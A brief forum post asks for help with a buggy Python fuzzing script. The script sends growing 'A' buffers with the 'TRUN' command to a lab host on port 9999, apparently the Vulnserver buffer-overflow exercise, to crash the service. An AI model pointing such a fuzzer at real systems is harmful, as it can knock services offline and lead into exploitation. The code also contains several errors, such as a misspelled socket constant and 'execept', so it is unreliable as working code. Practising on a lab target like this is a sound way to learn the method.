Hi All,
I am having this error with the code below please help.
#!/usr/bin/python
import sys, socket
buffer = "A" * 100
while True:
try:
s=socket.socket(socket.AF_INET,socket.SOCKET_STREAM)
s.connect(('192.168.0.23',9999))
s.send(('TRUN /.:/' + buffer))
s.close()
sleep(1)
buffer = buffer + "A"*100
execept:
print "Fuzzing crashed at %s bytes" % str(len(buffer))
sys,exit()
Thanks